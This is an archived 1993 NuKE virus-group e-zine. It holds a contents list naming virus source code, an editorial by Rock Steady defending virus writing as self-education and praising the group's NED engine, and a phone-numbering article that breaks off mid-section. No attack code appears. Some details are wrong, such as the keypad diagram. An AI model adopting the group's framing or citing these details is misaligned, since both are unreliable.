💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › NUKE › nk-info6.txt captured on 2022-06-12 at 13:40:39.
View Raw
More Information
-=-=-=-=-=-=-
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE NuKE Informational Journal -N
E- Volume 1 Issue #6 Nu
-N May 1993 uK
Nu KE
uK (C) Copyright NuKE, 1992, 1993 E-
KE <tm> NuKE is a trademark registered to NuKE Inc., which is a legally -N
E- registered company name in Canada & The United States of America Nu
-N uK
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
Article Topic/Titles
~~~~~~~~~~~~~~~~~~~~
000. This Article............................................................
001. Introduction to the "NEW" NuKE and NuKE Activities......................
002. A Guide to the North American Numbering System..........................
003. National Computer Security Association (NCSA) Cover Report..............
004. Interactive Realtime Information Service (IRIS) Guide...................
005. Programming the Floppy Disk Controller & the DMA Chip to bypass Int 13h.
006. The Varicella Virus Source Codes........................................
007. The `Arms Race' on Disk-Based Protection Methods : Round One............
008. The `Arms Race' on Physical Protection Devices : Round Two..............
009. AT&T Talk Tickets: Hacker's Heaven? Maybe...............................
010. Mafia, Incorporated. Underworld extends its reach.......................
011. Rivest, Shamir, Adleman, (RSA) Encryption...............................
012. `Clipper Chip' State-of-the-Art Encryption or State-of-the-Art Backdoor.
013. Lies, Scandals and Roomers of the Anti-Virus Community..................
Thanks to NuKE Contributors/Supporters (in alphabetical order)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Aristotle..............(USA)
Dr.X...................(Canada) Also Farewell To
FireCracker............(USA) ~~~~~~~~~~~~~~~~
Ford Fairlane..........(Sweden) Tormentor & DY.......(Sweden)
Lloyd..................(Sweden) (Good-bye Tormentor and your group
Ned239.................(USA) Demoralized Youth, it was an honour
Nereus.................(USA) to chat amongst thyselves. Thanx for
Nowhere Man............(USA) the constructive criticism, good
Prozen Doberman........(Australia) luck in the future.
Pure Energy............(Canada) Rock Steady/NuKE )
Rock Steady............(Canada)
Savage Beast...........(Switzerland)
Screaming Radish.......(Australia)
Shindaq Arl'hur........(Australia)
Silent Shadow..........(Canada)
TaLoN..................(Australia)
The Dark Elf...........(Australia)
The Weird One..........(Australia)
Throbbing Grisle.......(USA)
Uli....................(Switzerland)
Viper..................(USA)
H O W T O C O N T A C T N U K E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cybernetic Violence BBS....514-426-9194 v32B NuKE WHQ (*NEW NUMBER*)
Black Axis.................804-599-4152 v32B USA NuKE HQ
Realms of Choas.........+61-XX-ASK-NUKE Dual Australia NuKE HQ
Enigma E:N:U:N..........+41-22-340-0329 v32B European NuKE HQ
Please note that "Cybernetic Violence" BBS will under go a NEW Phone number
Starting May 29th, 1993. Please take note of the phone number, and remember
to call the new number on/after May 29th, 1993.
The above are free access systems, please feel free to contact the closest one
to you.
Signed, NuKE Members/Supporters
===============================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Introduction to the `New' NuKE and NuKE -N
E- Activities" Nu
-N uK
Nu By the Editor, KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% Introduction %
Welcome to the sixth issue of this Informational Journal. With regards to
what goes on in the `modem world' utterly known as CyperSpace, NuKE has
undergone several changes and recommendations in order to un-cloud the thoughts
and impressions, the public has towards NuKE.
I do wish to make it clear that there has been TWO unique gatherings of a
computer group called `NuKE'. The original founded by The Darkman, whom now
left the scene. And the seconded created by myself, Joseph Greco aka Rock
Steady. I wish to state out, I simply relived the NuKE name, old members with
The Darkman were evicted out of this New NuKE founded by myself, along with
Nowhere Man, Phrozen Doberman and Screaming Radish.
% What does this NuKE do? %
We are _not_ a copious group of computer virus programmers. Surely, we set a
few eminent examples that dominated the so-called `virus scene'. And surely
we have created ingenious creations that have pressured many others to
`mimic' our moves. How lethargic and bleak can some group/person get, if they
(the so-called virus groups) have to imitate _us_ whom are here simply for
the gain of self-knowledge? Frankly we are not solely a virus group, nor
`teens' for that matter. We understand that all the existing `so-called'
virus groups are kids/teens, and therefore can understand where such a label
can originate from.
The computer industry has opened a channel of unlimited information, a gain
for self-knowledge advancements. We members/supporters of NuKE only wish to
advance by self-knowledge advances and perhaps educate those that wish to be
educated. We need to educate the world, no more secrets, it is the only way
we can succeed in this world. And for this we are labelled as a computer
criminals. Why is it wrong to want to learn how a computer functions internally?
Why is it wrong to show you possible loops and holes that can make a computer
system vulnerable to unauthorised access.
There is a different class of society here in the computer world. A class that
can obtain knowledge at alarming rates. A class that seeks and lives on
information. A class that wishes to try out new ideas, and experiment others
in order to advance intellectually. And yet the public wishes to suppress this
minority group that can be even classified as ingenious.
Surely we must not mistake those that have a destructive intent into this
category. For I find that this type of disfigured character must be plucked out
just like a cancerous cell at its early cellular growth.
So what does NuKE do? Together we learn, and together we experiment. I wish to
bring out the fact that every article here, has undergone extensive research,
none of it is `second-hand' news. We will not take a `Michelangelo disassembly'
when the exact recreation exist. We will not talk about `Anti-Debugger'
routines when the exact article/examples have been seen in a text file publicly
floating around the Technodrome. We will not `mimic' anyone, or try to `look'
better than they, for the purpose that this is not a game of fame. NED was an
exceptional toolkit made in October 1992, that started with the idea of the
Dark Avenger's MtE. NED is now publicly available today, with it's SOURCE CODES,
and surely enough we will see _many_ "mimic-kids" producing their own based
on our trend, and make inarticulate claims that their engine was created
solely by they. Simply looking at NED will influence your style of programming.
Some unknown author in an unknown United States `so-called' virus group, has
already recreated a shroudy example, that structurally looks exactly like
N.E.D.
Anyhow, it's up to you, the reader, to proclaim theses jokers out. We will
not cloud our opinions with any emotional hatred to anyone or group. We
believe in publishing works that are original, or state an original opinion,
or fact.
The NEW NuKE is undergoing dramatic changes in order to help with our overall
impression. The New NuKE has even made major attempts to legalize itself
by registering its name. However we are still undergoing through this
legalization procedure, but do stay in tuned with the next Informational Journal
issued out mid-July 1993, which will contain our registered company name, and
number. Along with an official mailing address, (PO Box) registered to the
NuKE name. NuKE has already made attempts to branch itself into Internet.
As we may feature a open access unix (*NIX) site, we certainly will have a mail
link to send/receive UUCP mail to our WHQ BBS. (Cybernetic Violence).
% Ahhhh, We're on the Net %
I certainly cannot guaranty something in the making, but UUCP/Usenet connection
is a _very_ possible feature in the near future. I will not toy with you, I will
say simply that we are in the process of transforming our system(s), and looking
at all possible Unix based systems. It does look like that our choice will be
between 386BSD or Linux 0.99.7A, which feature the TCP/IP protocols to establish
a link with Internet, if that is to happen. Indeed, a Usenet feed will be made,
if our budget does not meet with Internet connection fees. We currently have
polled two 386/33Mhz PCs remotely, with a total disk space of 700 Megs and with
a CD-ROM to run the software off directly (Linux), all with three 14.4k V32Bis
modems and one 14.4k HST based modem. It will seem that we will feature an
opened Unix system. We find free informational groups such as NuKE should be
hooked up to perhaps, what is the biggest international network today.
It certainly will cut down on long distance toll charges, which seem to hover
at $500.00 monthly, hitting about $6000.00 yearly. This is Canadian Dollars,
however take into grant that Canadian long distance calls are much more cheaper
compared to our USA counter part. A one hour call originating from Canada to the
United States will cost $15.00 (Can$). Where the USA counter part will pay
closer towards $20.00 (US$), about $25.00 (Can$). The same does apply for
international calls, which tend to cost more if originating from the USA. All
in all, taking the currency exchange rate into account, that $6000.00 (Can$)
translates to $7000.000 (Can$) if originated from the USA.
I leave you to read the NuKE Informational Journal #6. If you do have any
comments that you wish to send to the Editor, Rock Steady, please do so.
If you wish to email me concerning a private matter, we feature Rock Steady's
personal public key.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2
mQCNAiv/nIAAAAEEAKuoCTNG4Ahwp9vsdc7FL7PpFEc/oss29OF30v44wNZ3Qwxh
uBrqjUOrRJyx3oLV3qrofaJG9BZp2u6NUpo0wTUOQHf0lUt/WWENbYdCYdFfz+Yt
x6XoGgKY5M/S2LEUOaDT48ye/E9VzW5bXg0if5fKnqpD7j+e/E0EOTLgG0HDAAUR
tB5Sb2NrIFN0ZWFkeSBvZiBOdUtFIFBHUCBLZXkgIzE=
=In5p
-----END PGP PUBLIC KEY BLOCK-----
% What's to come, of NuKE? %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This Informational journal sure was `bad' timing. All to be explain in due time,
of course. But we did prolong this journal for quite a long while, due to many,
many more articles we wanted to publish. Unfortunately, time stands still for
no-one, not even for NuKE. We gathered enough information for another
Informational Journal, but the articles were somewhat incomplete, to our
standards. We received several articles from guest writers concerning Cellular
Phones, Radio Communications, and other bits and pieces. If anyone has any
additions or experiences for these topics, please do confront us.
We await to see you soon...
================================================================================�================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "A guide to the North American Numbering -N
E- System" Nu
-N uK
Nu By KE
uK Nowhere Man E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% Introduction %
~~~~~~~~~~~~~~~~
Recently it was announced that the final available area code (under the current
area code format), 610, has been appropriated for use in southeastern
Pennsylvania. With this change, all standard area codes for the North
American phone system have been exhaused. While the final cutover to 610
will not be for another year, this is a landmark for our phone system. In
response to this announcement, I've decided to release various information
which I've been gathering about the North American phone system to the general
public. I hope everyone finds it of interest.
Please note that this article assumes that you know nothing about the
North American phone system, so readers from the United States and Canada
may find some of the information I present to be rather obvious (what 411
and 911 are, for example, or how various calls are placed by a customer);
please bear with me for the benefit of those in Europe, etc., as there's
some (in my opinion) very interesting information that I've uncovered about
out telephone network.
% Background %
~~~~~~~~~~~~~~
The North American phone network is the oldest in the world, yet also
uses some of the most modern techniques and equipment. Unlike the majority
of phone networks, which cover individual countries, the North American
phone system covers the United States, Canada, and most of the Caribbean
islands (such as Puerto Rico, Barbados, and so on). While calls between
various countries on the North American system are generally billed at
international rates, they are dialed like any other long-distance call.
The entire North American phone system is assigned the country code +1;
hence, it is often refered to officially as "World Zone One." World Zone
One is further divided into area codes (three digits), which cover larger
regions (states, provinces, etc.), exchanges, also three digits, which
cover towns or small parts of a larger city, and subscriber-loop numbers
(four digits), which identify a given customer in each phone exchange.
Together, these form a ten-digit phone number -- unlike many areas, North
American assigns ten digit numbers to everyone, regardless of location (in
contrast, the U.K. uses two-or-three digit city codes, an optional exchange
[for larger towns] of up to three digits, and four digit subscriber
numbers).
% Organization of area codes %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The de-facto standards bureau for North America's phone network is
Bell Communications Research Inc. (Bellcore). Bellcore was formed by AT&T
after it's divestiture in 1984 and provides technical and research support
to regional holding companies. Bellcore maintains common standards for the
telephone systems, ensures a smoothly operating telecommunications
netowork, and coordinates operations during national emergencies. Bellcore
assignes all area codes and guides other aspects of the telephone numbering
scheme.
Area codes, known as Numbering Plan Areas (NPAs) in North America are
presently of the form N0X or N1X where N represents a number between two
and nine, and X is any number between zero and nine; however, area codes
ending in -00 or -11 are reserved for special purposes (see below), and are
therefore currently unavailable. Originally, central office (exchange)
codes were in the form NNX, which distinguished them from area codes, as
only area codes had a zero or one in the second digit. However, with
increased demand for phone numbers, most exchanges have changed to the NXX
format (ie. the second and third digits of an exchange code can be any
number, zero to nine). Naturally this presents problems, as exchanges
whose seconds digit is one or zero are now indistinguishable from NPAs. As
a result, most areas use "one-plus" dialing: to make a long-distance call
you dial one plus the area code plus the local number.
Area codes were initially assigned in 1947, with at least one being
assigned to each American state and Canadian provice and several being
assigned to more populous ones -- in all 86 NPAs were originally assigned.
Currently the only exceptions to this "one or more NPAs per state" are in
Canada, where 902 serves both Nova Scotia and Prince Edward Island, area
819 covers the eastern Northwest Territories as well as part of Quebec, and
area 403 covers Alberta, Yukon and the western Northwest Territories; in
addition, the 809 area code covers many locations throughout the Caribbean,
from Puerto Rico to the Bahamas to the Virgin Islands to Jamaica. (Note:
Midway Island and Wake Island, two U.S. posessions in the Pacific Ocean
have just been added to area code 808 [Hawaii]. Prior to this time, they
were not direct dialable.)
The original proposal suggested that the 86 area codes be assigned in
a semi-regular pattern (for example, Canada would have been 915, 914, 913,
916, 917, 918, 919, 910 from east to west by province). This plan was
modified to eliminate the confusion caused by "similar" area codes
adjacent to each other. A state initially assigned a single area code
would have zero for it's NPAs middle digit, while a state with more than
one area NPA would have a one as a middle digit. Areas where more inward
calls were expected (major metropolitan areas like New York City) received
"short pull" area codes like 212, because the dialing time would be shorter
(remember, this was in the days of rotary phones) and the mechanical
switching equipment would be tied up for shorter periods. For example, New
York City received 212 (a total of five pulses), while Chicago and Los
Angeles, the next two most populous areas in the U.S., received 312 and 213
(six pulses each), respectively. This went all the way on down to NPA 809,
the Caribbean, which required 27 clicks of the rotary dial and would
presumably be dialed least frequently. Of course, with the dominance of
DTMF dialing, a region's NPA is no longer significant... (As a side note,
New Jersey was originally given the area code 201, the smallest
[numerically] area code, because Bellcore is headquartered there.)
Since the initial assignment, there have been numerous area code
splits, where certain telephone exchanges are removed from an area code and
placed into a new code. Since 1980 there have been at least twenty such
splits. The first split occured in the early 1950s, and the final split
will occur when 610 is created in 1994.
In the U.S., NPAs were further subdivided into LATAs (Local Access
Transport Areas) after the breakup of AT&T in 1984. Before this time,
there was no real definitation of what was local and what was
long-distance; in order to be fair to communities on state borders, etc.
(imagine paying LD charges to call five miles away!), LATAs were created
that encompassed "populated areas with common calling needs." All calls
made within a LATA are handled by the common local telephone company (New
York Telephone, Pacific Bell, Illinois Bell, etc.), which currently
subscribers cannot choose (this will probably change in the next few
years), while all calls between LATAs are handled by a customer-chosen
long-distance carrier (AT&T, MCI, Sprint, etc.) and are subject to federal
regulation. A LATA may cover a small area or a whole state; they are
usually contained within one NPA, but may cover several (e.g. the Chicago
LATA covers all of area codes 312 and 708). As of 1991 there were 196
LATAs (and I believe this will not change). Canada does not currently have
a LATA system, though it may soon develop one. LATAs are assigned codes,
but these are only for billing purposes, and are not dialed by the
customer; in fact, LATAs are transparent to the caller, except for
routing/billing purposes.
Direct Distance Dialing (the ability to place long-distance calls
without going through an operator) first was implemented on
November 10, 1951 in Englewood, New Jersey, USA, though it was not
wide-spread until the 1960s. There was early use of 11X+ codes for
long-distance dialing, but eventually 1+ long-distance dialing became
standard. As stated, area codes were assigned in 1947, five years before
anyone would need one. Why was it done? I'm not sure. It can only be
assumed this was done for 1) future planning and 2) the operators' benefit.
(Another odd thing is that 0+ [operated-assisted] dialing became available
in 1960, almost ten years after direct-dialing was introduced. Why did
they bother? Beats me.)
Surprisingly enough, a few tiny areas within the United States and
Canada are *still* not direct dialable, but they're in remote regions.
This includes some isolated ranches in the Texas desert (Bar J Ranch,
Double B Ranch, etc.), bordellos and truck stops in Nevada desert areas
(Amargosa, Corncreek, etc.), and some wilderness towns in California
within the U.S., and remote resorts in Ontario (Kingfisher Lake and Deer
Lake, for example) and isolated arctic villages in the Yukon and NWT
(Redknife, Taglu, etc.), in Canada. These areas must be serviced via
radiophone, so an operator is required.
% Non-standard area codes %
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Certain area codes are not available for normal purposes. These can
be generally subdivided into two categories: "Service Access Codes"
(SACs), NPAs ending in -00, or "11" services, NPAs ending in -11.
Service Access Codes are employed like normal access codes (and are
dialed normally), but are not assigned to customers in any one geographic
area. Rather, SACs are used for Wide-Area Telephone Service (WATS) by
business. Currently, only four SACs are employed, and only three can be
dialed by normal customers at the present.
600
~~~
The 600 NPA is currently reserved for Canadian TWX systems
(see below) and ISDN usage. To my knowledge, it is not dialable
by normal customers. (In fact, I've seen it used in TV shows
for 800 numbers like 555 is used for local numbers [ie: call
1-600-FLO-WERS for a fake flower company, since the real
1-800-FLO-WERS already belongs to FTD Florists, who would
probably not appreciate hundreds of crank calls tying up their
business line].)
700
~~~
1-700 numbers are used for Group Access Bridging (GAB) lines:
teleconferencing, EasyLink 700 service, chat lines, etc. (Note
the cute little acronym...who says Bell doesn't have a sense of
humour?) The most famous 700 service is Alliance<tm>
Teleconferencing from AT&T, but there are many other chat lines
available to those with lots of money to burn. The 700 exchange
is also used for AT&T EasyLink 700 service, where a customer
gets a phone number that can be rerouted to any phone he visits.
For example, if a businessman is traveling around the country,
at each hotel he stays at he can dial up an 800 number, enter
his phone number and PIN, then the current phone number, and all
calls to his EasyLink number ring on the phone line he entered;
now the office always knows which number he can be reached at.
In addition to GAB/EasyLink services, the 700 NPA is
sometimes used to allow intra-LATA calls to be placed via your
long-distance carrier. By dialing 1-700-NXX-XXXX you are really
calling NXX-XXXX but being billed by your long-distance company
instead of the local telco. Not all LD services offer this,
though (AT&T, for one, does not, but Telecom*USA does). To find
out if this is available from your carrier, either call the
long-distance operator, or try calling yourself via the 700 NPA
(if it's busy [or your call-waiting beeps] you can use the 700
area; or, you can call your other line, if you have one, or a
friend to test this out).
800
~~~
800 service was pioneered by AT&T in the 1960s and has since
become a world standard, with most countries adopting the 800
area code for toll-free dialing. 1-800 numbers are used by
businesses, and, increasingly, residential customers, as a
service to clients (or, in the case of home users, to college
students, truck drivers, and others who need to call home a
lot) -- the business decides which areas it wants to provide 800
access in (home state/province only, nearby states/provinces,
a whole region of the country, a whole country, U.S. and Canada,
or even international, all at increasing cost), and people in
those areas who call the 800 number are not billed for the call:
the business is. Each 800 number maps to a normal phone number,
and the caller is billed normally for the call, however just
before the bill is totaled, any 800 calls are removed from the
bill and instead billed to the 800 line's owner. The owner of
the 800 line pays a startup charge, a monthly fee, and a fee for
every fraction of an hour that the line is in use. (Note that
as of May 1, 1993 800 phone numbers belong to the business
that operates the line and *not* the phone company. This is a
step towards the day where every customer will get a permanent
phone number no matter where they move, which company they use,
etc. This also means that long-time customers are finally free
to leave AT&T without losing their old phone numbers...)
Before 800 service, local businesses could provide toll-free
service with "Zenith Numbers" (ie. ZEX-XXXX under the exchange-
name system). Since "Z" isn't on the phone dial, the caller had
to have an operator place the call, which was then billed to the
business. (This service is still in use in Canada.)
900
~~~
1-900 numbers are infamous as kinky phone sex lines, rip-off
astrological recordings, etc.; however 900 service is actually
much like 800 service... Nothing about 1-900 service dictates
that the caller be charged for the call (though he invariably
is) -- the key difference between 800 and 900 service is that
900 lines have much higher call-handling capacity (some 900
lines can receive hundreds of thousands of calls at once without
jamming!). In addition, 900 service allows the provider to
make the caller pay a portion of the charges. As a result, 900
lines have become pay-per-call lines, where the user is charged
$0.25-$50.00 plus per-minute costs to listen to pre-recorded
messages, chat one-on-one with some cheap whore, etc.
The other group of special "area codes" are the N11 series of NPAs.
These numbers are not true NPAs, but rather numbers that Bell has assigned
to certain key services (police/fire, directory assistance, etc.) as a
service to customers -- you just dial the three digits (or 1+ the three
digits in some areas), and the call is quickly completed. The -11 codes
include:
011
~~~
011 is the international dialing prefix in World Zone One.
(Unlike most of the rest of the world, which uses 00 for
overseas calls, North America uses 011.)
211
~~~
This code is no longer in service (to my knowledge), but in
"the old days," before Direct Distance Dialing (ie. pre-1960s),
211 called up the AT&T long-distance operator, who would place
your long-distance call for you. Naturally, this is no longer
needed (operator-assisted calls are placed via the long-distance
operator at 00), so 211 is generally not used in most areas (in
a few NPAs 211 is a ringback).
411
~~~
411 reaches local directory assistance (as if you dialed
555-1212). This operator only gives numbers within your NPA
(sometimes in neighbouring NPAs, too); to find a number in a
different area you have to dial NPA-555-1212.
511
~~~
511 is generally unused, though in a few places it is used
for ringback.
611
~~~
611 reaches your local telephone company's repair office.
You provide the man/lady with your error, and for an outragous
fee ($1.15/minute in my area), they'll send out a lineman to
(hopefully) find and correct the problem.
711
~~~
The 711 code is not always available, and it's actions
depend on where you live -- in British Columbia, for example,
0+711 is used for mobile service, while in Illinois 711 reaches
the emergency bureau as if you dialed 911 (see below). In a few
areas 711 is the ringback number.
811
~~~
In some areas 811 dials the local telco's business office.
This code was more universal in the past, as now most areas
have moved the business office to a 1-800 number (leaving 811
unused).
911
~~~
The world-famous 911 code calls up a special emergency center
where your call is processed and forwarded on to the appropriate
agency (police, fire department, ambulance, etc.). The 911
operators automatically receive your name, phone number, address
and other information when you call (computers and ANI do the
magic), so be wary of trying to mess with this service (not a
good idea anyway, as 911 performs a valuble public service).
911 is not available in all areas (mostly rural areas), so this
code isn't universal.
% Unusual area codes %
~~~~~~~~~~~~~~~~~~~~~~
At one time, several area codes were used for non-standard purposes.
These deserve some special attention.
Area codes ending in -10 used to be TWX (TeletypeWriter eXchange) area
codes. (TWX was an old system used in the days before faxes and modems.
Teletypewriters communicated similar to terminals -- a person on the
transmitting end would type a message, and a printer on the receiving end
would print it out. This is how telegrams were sent.) TWX area codes were
not normally dialable from a regular phone, to my knowledge, and were
reassigned to regular telephone service as the demand for new NPAs
increased and TWX service was eliminated (around 1990). The TWX NPAs
served the following regions:
410 - United States, northeastern region
510 - United States, east of Chicago
610 - Canada [now located at NPA 600]
710 - United States, southeastern region
810 - Mexico
910 - United States, from Chicago westward
The other set of area codes that deserves mention are the Mexico
access numbers. Mexico is not integrated into World Zone One, and is
assigned the country code +52. However, a large number of calls are placed
to Mexico from North America, so in the days before International Direct
Distance Dialing was universal, AT&T assigned three special NPAs for
Mexico. These were not NPAs in the true sense: they mapped to Mexican
city codes and local numbers. In addition, they were not dialable from
outside of the U.S. and Canada. By 1990 IDDD was available from everwhere
in North America, so on February 1, 1991 the codes were released for use as
true area codes. These codes were as follows:
706 - Northwest Mexico (Tijuana area) [now northern Georgia]
903 - Southwest Mexico (Guadalajara area) [now northeast Texas]
905 - Mexico City area [soon to be southern Ontario]
As you might have noticed, these numbers convieniently map to Mexican
phone numbers: 706 was really for 70-6X-XXXXXX, 903 was for 90-3X-XXXXXX,
and 905 was for 90-5-XXX-XXXX. All of these map to ten digits, an NPA
and local number in World Zone One...
The 909 area code was used at one time for the Telenet Communications
Data Network, now known as SprintNet. When area codes became scarce, Bell
took back the area from Telenet, giving it an "interchangeable" area code
instead (see below); I'm not sure which area they received. 909 was
chosen, naturally, because it takes the longest ammount of time of any area
code to dial on a rotary phone (28 clicks). Since Telenet was to be used
by computers, which had TouchTone dialing, this didn't matter... 909 is
now being used by Riverside and San Bernadino Counties in southern
California (formerly part of the 714 area).
Finally, what about the 710 area code? 710 is reserved for telephone
company and U.S. government purposes, but little is known beyond that.
It *cannot* be dialed from a normal telephone. Most operators deny its
existance. Which agencies use it? Why? Is this NPA for special "secured
lines?" Is it even used at all? If anyone has more information about this
area code, please let me know.
% Area code statistics %
~~~~~~~~~~~~~~~~~~~~~~~~
Which states/provinces have the most area codes? Here are the top five:
1. California, USA -- 13
2. New York, USA/Texas, USA -- 9
3. Illinois, USA -- 6
4. Ontario, Canada/Pennsylvania, USA -- 5
5. Florida, USA/Ohio, USA/Michigan, USA -- 4
(Note: After 416 splits, Ontario will be tied with Illinois for 3rd
place with six area codes each; Michigan will move up to number four with
five NPAs when 313 finally splits. At least ten states and one province
have three NPAs.)
Which area codes have the most exchanges in them? The top ten are:
1. 212 (New York, USA) -- 705*
2. 205 (Alabama, USA) -- 693
3. 919 (North Carolina, USA) -- 691*
4. 313 (Michigan, USA) -- 688*
5. 416 (Ontario, Canada) -- 680*
6. 215 (Pennsylvania, USA) -- 665*
7. 602 (Arizona, USA) -- 657
8. 206 (Washington, USA) -- 649
9. 708 (Illinois, USA) -- 644
10. 713 (Texas, USA) -- 636
(Note: Starred exchange numbers mean that the NPA is scheduled for
a split by 1994 [212 is moving some exchanges to 718 right now].)
Which area codes have the fewest exchanges? The top ten are:
1. 807 (Ontario, Canada) -- 105
2. 906 (Michigan, USA) -- 117
3. 302 (Delaware, USA) -- 129
4. 413 (Massachusetts, USA) -- 135
5. 401 (Rhode Island, USA) -- 141
6. 307 (Wyoming, USA) -- 171
7. 607 (New York, USA) -- 176
8. 719 (Colorado, USA) -- 179
9. 802 (Vermont, USA) -- 181
10. 506 (New Brunswick, Canada) -- 182
(Note: 917 [New York pager/celluar service] was omitted because it
is growing too fast... It had 104 exchanges as of January, but by
April is had 124. By now it surely has more. Besides, I don't like to
consider it a real area anyway.)
(All exchange data is from April 15th, 1993, so this may have
changed by now.)
Which area codes have the most unlisted numbers? Well, nine out of
the top ten area codes are in California. While most people would probably
quickly attribute this to the infamous "California" attitude, it's most
likely due to the fact that Pacific Bell offers the lowest rates for
unlisted numbers ($0.30/month in California, compared to $1.50/month in
Chicago, $1.88/month in New York, and $4/month in Idaho). The ten NPAs
with the most unlisted numbers (in percent of total numbers) are:
1. 702 (Las Vegas, Nevada, USA) -- 64.6%
2. 209 (Freson, California, USA) -- 63.1%
3. 213 (Los Aneles, California, USA) -- 61.7%
4. 510 (Oakland, California, USA) -- 61.6%
5. 408 (San Jose, California, USA) -- 60.2%
6. 916 (Sacramento, California, USA) -- 59.8%
7. 909 (Riverside, California, USA) -- 57.7%
8. 818 (Anaheim, California, USA) -- 57.1%
9. 619 (San Diego, California, USA) -- 56.5%
10. ??? (Bakersfield, California, USA) -- 55.2%
Finally, which areas were considered "the most important" when area
codes were handed out; in other words, which areas were assigned the NPAs
which required the fewest number of clicks on a rotary phone? The top five
are:
1. New York City -- 5
2. Chicago/Los Angeles -- 6
3. Dallas/Detroit/Pittsburgh -- 7
4. Philadelphia/St. Louis/Boston/Austin -- 8
5. Cleveland/Syracuse/Milwaukee/Minneapolis -- 9
(This assumes the original area codes as assigned in the fifties, ie.
212 covers all of New York City, etc.)
% Assignment of exchanges %
~~~~~~~~~~~~~~~~~~~~~~~~~~~
When the telephone was first introduced, central-office operators sat
at switchboards, completing connections in response to spoken requests.
There were few enough phone lines so the operator simply knew where to plug
in for the call. That began to change during an outbreak of the measels in
Lowell, Massachusetts, in 1879. The town doctor, feared that if all four
operators fell ill, their substitutes would have trouble connecting people
unless every line got a number. The idea quickly caught on.
In the 1880s telephone service quadrupled in the nation's settled
areas. Cities soon had not only a central office and phone numbers but
exchanges in other parts of town, so callers now asked for Main or
Central plus the subscriber's several-digit number. Branch exchanges
usully took their names from their relative geography, street names,
or names of neighborhoods. Bell devised phonetic tests to help make sure
only easily understood names were chosen. When neighborhood and street
names started to run out, the Bell System recommended new names, like
Evergreen, Lakeside, Poplar, and Walnut.
By the time dialed calling was introduced in the Bell System in 1921
the exchange name were so ingrained that Bell Telephone kept them on.
William G. Blauvelt of AT&T had divided the alphabet into groups of
three letters for each of the dial's openings in 1917. Z was omitted
because, well, it was the last letter; that left an odd letter to
eliminate. It came down to Q and X, the two most infrequent letters in
English, but Bell finally decided to keep X, since Q could only be followed
by U, limiting the number of possible exchange names. And because a single
phone-number pulse could be transmitted when the receiver lifted or the
finger wheel was jarred, no calls would be initiated until a pulse signal
of at least two was received; thus the number one got no letters attached
to it.
Dialing swept the nation, but only large cities used exchange name
dialing; in small towns one still had only to dial a three- or four-digit
number. (As a side note, why was it that subscriber numbers were never
more than four digits? It's a carry-over from the early days before
direct dialing. It was determined that an operator could not reach more
than 10,000 plugs without getting up from her seat...)
Seven-digit numbers became standard only after World War II. New York
City had pioneered them in the early 1930s when it began inserting an
"exchange-designation number" after the two-letter exchange prefix (for
example, you used to dial RA6-9999 for the RAndolph exchange in Chicago,
with six as the "exchange-destination number"). By the mid-1950s all other
major cities were converted to this system, replacing such combinations as
Chicago's three letters and four digits, Cleveland's two letters an four
digits, and Dallas's one letter and four digits. In 1961 Bell Telephone
announced that it would phase out exchange name dialing city by city.
Pittsburgh and Cincinnati began converting in 1962; Philadelphia and
Seattle were the last to change, in 1978. The classic combiation of two
letters and five numbers was a fully national standard for less than a
decade.
The two-letter-five-number system was also used in Canada, though I'm
not sure how widely. Vancouver, British Columbia was one city to use
this system, though I don't how many others did. (Anyone have any
information about this?)
All-number calling was introduced for several reasons. Mainly there
weren't enough workable letter combinations. Exchanges like 571 had
stayed unavailable because letters like JKL (5) and PRS (7) wouldn't
combine. All-number calling also eliminated hard-to-spell exchanges,
prevented mix ups between similar leters and numbers like O and 0, and made
possible direct dialing from Europe and other parts of the world, where
most phones never had letters on their dials.
For the benefit of those outside of North America, I have included
a diagram of how our phone pads are layed out and which letters are
assigned to which key:
?????????????????????????
? 1 ? 2 ? 3 ?
? ? ABC ? DEF ?
?????????????????????????
? 4 ? 5 ? 6 ?
? GHI ? JKL ? MNO ?
?????????????????????????
? 7 ? 7 ? 8 ?
? PRS ? TUV ? WXY ?
?????????????????????????
? * ? 0 ? # ?
? ? OPER ? ?
?????????????????????????
(Note: the zero key is marked "OPER" because dialing zero will summon
the local operator. Zero and one have no letters officially assigned to
them. Some people like to claim that one is "Q" and zero is "Z", but I
have never seen one or zero used in that fashion before.)
Each area code has certain exchanges set aside for special purposes.
These exchanges are:
555
~~~
Local directory assistance. Dialing NPA-555-XXXX will get you
directory assistance for the given area. This is why most phone
numbers in movies and TV shows are 555-XXXX or KLondike-5 XXXX...
People whose numbers were used in movies, etc. complained to the
studios after getting hundreds of calls from losers asking for
James Bond or whatever. (One family's phone number appeared on the
cover of a heavy metal album and is now suing the band after
receiving thousands of threatening phone calls from fans.)
This use of 555-XXXX is purely a voluntary thing; a long time ago
Bell was able to reserve certain exchanges throughout the country
that producers could safely use, but with a shortage of telephone
exchanges they had to stop this practice.
950
~~~
Used to access other long-distance services. This is called
Feature Group B equal access. To use the service you call their
950 number (which is a free call), then enter your multi-digit PIN,
then dial the number you wish to call. Almost all areas now have
Feature Group D service (Equal Access), where you select an
alternate carrier and then use it normally, like you used to use
